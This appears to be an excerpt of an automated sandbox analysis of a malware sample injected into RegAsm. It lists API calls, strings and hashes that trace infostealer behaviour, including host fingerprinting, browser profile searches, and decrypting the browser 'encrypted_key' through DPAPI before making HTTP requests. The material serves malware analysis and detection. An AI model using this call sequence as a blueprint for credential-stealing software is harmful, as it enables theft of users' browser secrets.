                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004119A1
                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411A18
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00411A1F
                                                    • wsprintfA.USER32 ref: 00411A54
                                                    • lstrcatA.KERNEL32(00000000,00429270), ref: 00411A65
                                                      • Part of subcall function 00412667: GetCurrentHwProfileA.ADVAPI32(?), ref: 00412674
                                                    • lstrlenA.KERNEL32(00000000), ref: 00411A7E
                                                      • Part of subcall function 004136CE: malloc.MSVCRT ref: 004136D5
                                                      • Part of subcall function 004136CE: strncpy.MSVCRT ref: 004136EB
                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00411AAC
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                    • String ID: :$C$\
                                                    • API String ID: 2389002695-3809124531
                                                    • Opcode ID: 23f1d57f010f06b3a3b0b73a3a18805c0e588e37821cf8b5f81c9e51efc94560
                                                    • Instruction ID: b4310f208fa9535f9906633d23b413fd942b8933ce9b069d1c57af1ba558f1c2
                                                    • Opcode Fuzzy Hash: 23f1d57f010f06b3a3b0b73a3a18805c0e588e37821cf8b5f81c9e51efc94560
                                                    • Instruction Fuzzy Hash: EC417E71D0024CAFDF10EBA0DD59BED7BB8AF05305F10009AF219A61A1DB799BC4CB68
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • RegOpenKeyExA.KERNEL32(00000000,00000000,00020019,00000000,00425200), ref: 004121DE
                                                    • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00412259
                                                    • wsprintfA.USER32 ref: 0041228B
                                                    • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 004122AC
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Openlstrcpy$Enumwsprintf
                                                    • String ID: - $%s\%s$?
                                                    • API String ID: 2731306069-3278919252
                                                    • Opcode ID: db84e063afdd8ab9a369cff0a91b897787bc4edace59e265c4489125e3bbefbc
                                                    • Instruction ID: 317e1264205bd673c815d3a78023c7176152d2c53d3ea0851a7731e254f809d5
                                                    • Opcode Fuzzy Hash: db84e063afdd8ab9a369cff0a91b897787bc4edace59e265c4489125e3bbefbc
                                                    • Instruction Fuzzy Hash: 1C71F47290012CABEB64EB50DD45FD973B9BF04305F5086EAE209A20A1DF746BC9CF94
                                                    APIs
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404373
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404387
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 0040439B
                                                      • Part of subcall function 0040430F: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043B9
                                                      • Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043C9
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004061A8
                                                    • StrCmpCA.SHLWAPI(?,?,?,?,?,?,?,?), ref: 004061E6
                                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00406229
                                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?), ref: 0040624D
                                                    • InternetReadFile.WININET(8cA,?,00000400,?), ref: 00406271
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?), ref: 0040629D
                                                    • CloseHandle.KERNEL32(?,?,00000400,?,?,?,?,?,?,?), ref: 004062DB
                                                    • InternetCloseHandle.WININET(8cA), ref: 004062E4
                                                    • InternetCloseHandle.WININET(?), ref: 004062F0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                    • String ID: 8cA
                                                    • API String ID: 2507841554-2586977368
                                                    • Opcode ID: 23bbd80859a5ae626456c0e29d0c535548952ba2e1dd46435b22cc47d41a132e
                                                    • Instruction ID: 322e9e665ac9740ae3a6c79426317fb00e7d6d1b0345a24b3972b26df0cd3c85
                                                    • Opcode Fuzzy Hash: 23bbd80859a5ae626456c0e29d0c535548952ba2e1dd46435b22cc47d41a132e
                                                    • Instruction Fuzzy Hash: BC515CB190021CABDF20EF60DC45BED7779FB01305F1050AAE616BA1E1DB786A99CF58
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(00000000,?,?), ref: 0040F9EF
                                                    • StrCmpCA.SHLWAPI(00000000,?,?), ref: 0040FA75
                                                    • StrCmpCA.SHLWAPI(00000000,?,?), ref: 0040FB84
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040FC57
                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040FCDD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID: Stable\$firefox
                                                    • API String ID: 3722407311-3160656979
                                                    • Opcode ID: 4574c3fe41a2655a61f88f0eef0b3d3de2eb2ac0277edcd828de38c39bfa1635
                                                    • Instruction ID: 87d147e04e3a24980a39275aa9b0abb6dd5f2e96552c08bd51d602dc9e077d04
                                                    • Opcode Fuzzy Hash: 4574c3fe41a2655a61f88f0eef0b3d3de2eb2ac0277edcd828de38c39bfa1635
                                                    • Instruction Fuzzy Hash: 18D16772A001099BCF24FBB5DD96FDD77B9BB50304F10402AE906EB1A1EE35DA48C795
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,00428E48,00000000,?,00000000,00000000,?,Windows: ,00000000,?,00428FE4,00000000,?,Work Dir: In memory), ref: 0041208E
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00412095
                                                    • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 004120B6
                                                    • __aulldiv.LIBCMT ref: 004120CE
                                                    • __aulldiv.LIBCMT ref: 004120DC
                                                    • wsprintfA.USER32 ref: 004120FF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                    • String ID: %d MB$@
                                                    • API String ID: 2886426298-3474575989
                                                    • Opcode ID: e44640eb945edcdb330fccb508c3ea3b329ff7572ab2c3ac08101b3669067511
                                                    • Instruction ID: da943534dc948d73dd967abc6d37c718adf03b454bdf056c0f5a7879574b1967
                                                    • Opcode Fuzzy Hash: e44640eb945edcdb330fccb508c3ea3b329ff7572ab2c3ac08101b3669067511
                                                    • Instruction Fuzzy Hash: 71015EB0E40218BFEF00AFE0DC0ABADBBB9FB05749F104409F314B9090C7B866519B58
                                                    APIs
                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00404373
                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00404387
                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 0040439B
                                                    • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043B9
                                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 004043C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CrackInternetlstrlen
                                                    • String ID: <$<
                                                    • API String ID: 1274457161-213342407
                                                    • Opcode ID: 94d81e5e955a971915de60a229a9877af64f0f003ab4a34939c35b93bd59b886
                                                    • Instruction ID: 01f5d62e614e23a6b162f059a70a9e0953d43a02f97c16b9683ed6508c4b1ff7
                                                    • Opcode Fuzzy Hash: 94d81e5e955a971915de60a229a9877af64f0f003ab4a34939c35b93bd59b886
                                                    • Instruction Fuzzy Hash: 48214771D00218AFDB10DFA9E881BCDBBB4BB04324F10815AE669F72A0DB345A85CF10
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00406312: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406373
                                                      • Part of subcall function 00406312: StrCmpCA.SHLWAPI(?), ref: 00406390
                                                      • Part of subcall function 00406312: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004063BE
                                                      • Part of subcall function 00406312: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00400100,00000000), ref: 0040640A
                                                      • Part of subcall function 00406312: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00406442
                                                      • Part of subcall function 00406312: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406453
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00417F96
                                                    • lstrlenA.KERNEL32(00000000), ref: 00417FAD
                                                      • Part of subcall function 00412FD6: LocalAlloc.KERNEL32(00000040,00000001), ref: 00412FF2
                                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00417FDD
                                                    • lstrlenA.KERNEL32(00000000), ref: 00417FF9
                                                    • lstrlenA.KERNEL32(00000000), ref: 0041801F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                                    • String ID: ERROR
                                                    • API String ID: 3240024479-2861137601
                                                    • Opcode ID: e56dbd6892063ce075c71f30584f65b6369d35785078b77fb4a32cfd08f74c49
                                                    • Instruction ID: 82a00ccf74cc6928f093117e63f16261f372f6c033bbdc91f1bb176def9d3ff2
                                                    • Opcode Fuzzy Hash: e56dbd6892063ce075c71f30584f65b6369d35785078b77fb4a32cfd08f74c49
                                                    • Instruction Fuzzy Hash: 24511A71910108ABCB04FFA1D956AED7774BF11309F60402EF916A61F2DF39AA89CA48
                                                    APIs
                                                    • memset.MSVCRT ref: 004125F2
                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 00412612
                                                    • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00412639
                                                    • CharToOemA.USER32(00000000,?), ref: 00412659
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CharOpenQueryValuememset
                                                    • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                    • API String ID: 1728412123-1211650757
                                                    • Opcode ID: 195b74b0a96cc35dac2f772ac61cfb819d8275be74710b7e5bc2e41235a95a6e
                                                    • Instruction ID: 19f088c07c09de6674c761c0d1b751acc79a05fefe0ca058460f00b60f9401a7
                                                    • Opcode Fuzzy Hash: 195b74b0a96cc35dac2f772ac61cfb819d8275be74710b7e5bc2e41235a95a6e
                                                    • Instruction Fuzzy Hash: 1B016275A4022DBBDB209B50DD4AFDA777CEB14704F5001E1B688F6091DBF46AC48F54
                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407D05
                                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00407D29
                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00407D48
                                                    • ReadFile.KERNEL32(000000FF,00000000,?,0040F582,00000000), ref: 00407D6E
                                                    • LocalFree.KERNEL32(00000000), ref: 00407DA0
                                                    • CloseHandle.KERNEL32(000000FF), ref: 00407DA9
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                    • String ID:
                                                    • API String ID: 2311089104-0
                                                    • Opcode ID: b0c26b6f574b650b3bbe433578a167a4ae74d057130e38fdececdba59a5ca05d
                                                    • Instruction ID: 20c10e672a0f3402bfbef9d3d1be989891e350540804f4a5b6ad44830b3c41ef
                                                    • Opcode Fuzzy Hash: b0c26b6f574b650b3bbe433578a167a4ae74d057130e38fdececdba59a5ca05d
                                                    • Instruction Fuzzy Hash: 6C31F174E00209EFDF11DFA4D849BEE7BB5BF0A301F104065E911AB2A0D778AA91CF55
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411AF1
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00411AF8
                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000), ref: 00411B29
                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,?,000000FF), ref: 00411B47
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                    • String ID: Windows 11
                                                    • API String ID: 3676486918-2517555085
                                                    • Opcode ID: 346f3f4664875a4ea084d75b8818ec132410f9d5b334d0546c756ba2ab9ffa29
                                                    • Instruction ID: 3f27d459ef3b4295677ace20887899c1ffae7c715c4ca525cf07eb428eb26eef
                                                    • Opcode Fuzzy Hash: 346f3f4664875a4ea084d75b8818ec132410f9d5b334d0546c756ba2ab9ffa29
                                                    • Instruction Fuzzy Hash: 84013C34A44208FBEB10ABE0EC0AB9D7B7AFB06744F1050A5F701AA1A1E7749A94DB14
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411B6F
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00411B76
                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00411B06), ref: 00411B95
                                                    • RegQueryValueExA.KERNEL32(00411B06,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00411BB2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                    • String ID: CurrentBuildNumber
                                                    • API String ID: 3676486918-1022791448
                                                    • Opcode ID: 6763c454cfa2fbe29bba7aff6e2c919a48f957ef8388f20bd06a009583ecdfc3
                                                    • Instruction ID: 29d7a5e80dbd030fd5711505aedc04f660bf528dc6b38352957baa02463c1007
                                                    • Opcode Fuzzy Hash: 6763c454cfa2fbe29bba7aff6e2c919a48f957ef8388f20bd06a009583ecdfc3
                                                    • Instruction Fuzzy Hash: 42F04F75A40209FFEB00AFE0EC0AFEDBBB9FB05704F101095F200A90A1D7B05690DB54
                                                    APIs
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0041FD9F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 28e4449246bdff4538dfa03a6f885fd424cd5e53fb953e1d424f3e4a8a48cfb0
                                                    • Instruction ID: 5f3c8af357893ed153ccb181933e0c92fd25f58187f5847643f7a6c701f82d74
                                                    • Opcode Fuzzy Hash: 28e4449246bdff4538dfa03a6f885fd424cd5e53fb953e1d424f3e4a8a48cfb0
                                                    • Instruction Fuzzy Hash: D561CE70A00209DFDB10CF54D948BAEB7F1BB04725F258166E515AB391C3B4DE86CB6A
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00407CDF: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407D05
                                                      • Part of subcall function 00407CDF: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00407D29
                                                      • Part of subcall function 00407CDF: LocalAlloc.KERNEL32(00000040,?), ref: 00407D48
                                                      • Part of subcall function 00407CDF: ReadFile.KERNEL32(000000FF,00000000,?,0040F582,00000000), ref: 00407D6E
                                                      • Part of subcall function 00407CDF: LocalFree.KERNEL32(00000000), ref: 00407DA0
                                                      • Part of subcall function 00407CDF: CloseHandle.KERNEL32(000000FF), ref: 00407DA9
                                                      • Part of subcall function 00412FD6: LocalAlloc.KERNEL32(00000040,00000001), ref: 00412FF2
                                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00407FDF
                                                      • Part of subcall function 00407DC2: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00406095,00000000,00000000), ref: 00407DE6
                                                      • Part of subcall function 00407DC2: LocalAlloc.KERNEL32(00000040,00406095,?,?,00406095,00000000,?), ref: 00407DF7
                                                      • Part of subcall function 00407DC2: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00406095,00000000,00000000), ref: 00407E1D
                                                      • Part of subcall function 00407DC2: LocalFree.KERNEL32(00000000,?,?,00406095,00000000,?), ref: 00407E31
                                                    • memcmp.MSVCRT ref: 00408034
                                                      • Part of subcall function 00407E41: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00407E65
                                                      • Part of subcall function 00407E41: LocalAlloc.KERNEL32(00000040,00000000), ref: 00407E83
                                                      • Part of subcall function 00407E41: LocalFree.KERNEL32(?), ref: 00407EAB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                    • String ID: $"encrypted_key":"$DPAPI
                                                    • API String ID: 1204593910-738592651
                                                    • Opcode ID: cb5a7b3697549c6f230e63b8f069386ffd445f3a9418a1f9903da71664ec03a3
                                                    • Instruction ID: 8d589a117900b415cc4759a7c5c28772ff61d9ce457947e60a2fc3858aeb04fe
                                                    • Opcode Fuzzy Hash: cb5a7b3697549c6f230e63b8f069386ffd445f3a9418a1f9903da71664ec03a3
                                                    • Instruction Fuzzy Hash: 74310E71D0010DABDF11DBA5DD45BEEBBB8AF04304F14012AE840B2291EB799A58DB99
                                                    APIs
                                                    • CoCreateInstance.OLE32(0042AC28,00000000,00000001,004292EC,00000000,?,?,?,?,004128EF), ref: 004126EA
                                                    • SysAllocString.OLEAUT32(?), ref: 00412700
                                                    • _wtoi64.MSVCRT ref: 0041274D
                                                    • SysFreeString.OLEAUT32(?), ref: 00412771
                                                    • SysFreeString.OLEAUT32(00000000), ref: 0041277A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: String$Free$AllocCreateInstance_wtoi64
                                                    • String ID:
                                                    • API String ID: 1817501562-0
                                                    • Opcode ID: f48b06c7123509e446c0da83949f76becdf3deb21f21affda6d357694f029a8c
                                                    • Instruction ID: 58adf380e0662d1b76d21edb75c8d821cdd3313fccb4f2387b68fcf25dfbec8a
                                                    • Opcode Fuzzy Hash: f48b06c7123509e446c0da83949f76becdf3deb21f21affda6d357694f029a8c
                                                    • Instruction Fuzzy Hash: 2E310575E04219EFCB05DFA9D849BEEBBB4FB08315F00416AE911E32A0C7795951CFA4
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(00000000,?,?), ref: 0040F9EF
                                                    • StrCmpCA.SHLWAPI(00000000,?,?), ref: 0040FA75
                                                    • StrCmpCA.SHLWAPI(00000000,?,?), ref: 0040FB84
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040FC57
                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040FCDD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID: Stable\
                                                    • API String ID: 3722407311-272486606
                                                    • Opcode ID: b1a1266439bdf2a0e8ec9dc9193cdc2636f5054d60504534493cfb04d58e2737
                                                    • Instruction ID: 7cd2c182165b9fee31fd49b72ff1b8ad9c7a36b01791bf89c52de0b726780448
                                                    • Opcode Fuzzy Hash: b1a1266439bdf2a0e8ec9dc9193cdc2636f5054d60504534493cfb04d58e2737
                                                    • Instruction Fuzzy Hash: CD511271A00109ABCF14FBB5DD96BDD77B9BB60304F10402AE906EB1A1EE35DB49CB85
                                                    APIs
                                                    • ReadFile.KERNEL32(?,?,?,?,?), ref: 1FA2FE03
                                                    Strings
                                                    • winRead, xrefs: 1FA2FE3D
                                                    • delayed %dms for lock/sharing conflict at line %d, xrefs: 1FA2FE78
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                    • API String ID: 2738559852-1843600136
                                                    • Opcode ID: 8d81df1d26f15456dd64643fa8c9781e48928c5e677bb9d4651ab21bf6ceb7c8
                                                    • Instruction ID: d00554edbefe085214e12dc792ed7c5fc6d9015e6c998a5b79176442e015b8ae
                                                    • Opcode Fuzzy Hash: 8d81df1d26f15456dd64643fa8c9781e48928c5e677bb9d4651ab21bf6ceb7c8
                                                    • Instruction Fuzzy Hash: 7741F372B04345ABC304DF64CD809ABB7E9FF84624FC4092DFA4186641E72DF9198BA2
                                                    APIs
                                                    • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 00408220
                                                    • LoadLibraryA.KERNEL32 ref: 004082A8
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00411715: lstrlenA.KERNEL32(?,?,?,00419018,00425200,00425200,?,?,?,0041ABB6), ref: 0041171F
                                                      • Part of subcall function 00411715: lstrcpyA.KERNEL32(0041ABB6,00000000,?,00419018,00425200,00425200), ref: 0041176D
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,00428E34,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00425200), ref: 00408294
                                                    Strings
                                                    • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00408215, 00408229, 0040823F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                    • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                    • API String ID: 2929475105-3463377506
                                                    • Opcode ID: 33191907c34fe30b91932b9d02352948c94fa74ece7802ec8efd6249ff31ed7f
                                                    • Instruction ID: 84292c169819be5b53b0aa043c90a357ac7ef937680942749e622d56a9f64c6e
                                                    • Opcode Fuzzy Hash: 33191907c34fe30b91932b9d02352948c94fa74ece7802ec8efd6249ff31ed7f
                                                    • Instruction Fuzzy Hash: 91413931905245DFEB05EBA1FD66AE937B6FB04305F20612EE901A12F1DF395988CF98
                                                    APIs
                                                    • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00412259
                                                    • wsprintfA.USER32 ref: 0041228B
                                                    • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 004122AC
                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,000F003F,?,00000400), ref: 0041231A
                                                    • lstrlenA.KERNEL32(?), ref: 0041232F
                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00428E48), ref: 004123C6
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
